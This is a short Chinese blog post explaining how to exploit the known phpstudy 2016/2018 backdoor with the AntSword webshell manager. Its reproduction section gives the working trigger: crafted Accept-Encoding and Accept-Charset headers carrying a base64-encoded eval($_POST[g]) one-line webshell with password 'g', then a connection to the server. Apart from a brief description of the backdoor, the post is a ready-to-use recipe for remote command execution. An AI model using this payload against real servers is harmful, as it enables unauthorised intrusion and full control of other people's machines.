您的位置 首页 php

利用中国蚁剑无文件连接phpstudy后门方法

智云科技发布于 2022年5月19日评论关闭阅读(497)

0x01描述

Phpstudy是一款PHP调试环境的程序集成包,集成了最新的 Apache 、PHP、 phpMyAdmin 、ZendOptimizer等多款软件一次性安装,无需配置,即装即用。由于其免费且方便的特性,在国内有着近百万的PHP语言学习者、开发者用户。

后门名称: phpstudy 后门

威胁等级:严重

影响范围:Phpstudy 2016、phpstudy2018

后门类型:C&C、命令执行

利用难度:极易

0x02复现

利用工具:中国蚁剑

phpstudy:2016 PHP-5.4.45

ae500156329d41ffaf29e32073918231 

Accept-Encoding:gzip,deflateAccept-Charset:base64加密执行的命令一句话木马:ZXZhbCgkX1BPU1RbZ10pOw== 密码:g

配置HTTP消息头

3c652a98995a4c13a39bb7d22fc42621

连接成功

c550425b30a44c54ac22780a8d6c27f6

标签:
打赏 点赞(3)

文章来源:智云一二三科技

文章标题:利用中国蚁剑无文件连接phpstudy后门方法

文章地址:https://www.zhihuclub.com/42885.shtml

关于作者: 智云科技

相关文章

热门文章

1分享新浪图床上传接口源码

点赞(897)阅读(59,846)

2PHP简单实现路由Route功能

点赞(1.11K)阅读(35,943)

3Tideways、xhprof 和 xhgui 打造 PHP 非侵入式监控平台

点赞(324)阅读(4,275)

4centos系统如何查看是否安装了mysql

点赞(498)阅读(3,758)

5curl 工具简述

点赞(467)阅读(2,960)
网站地图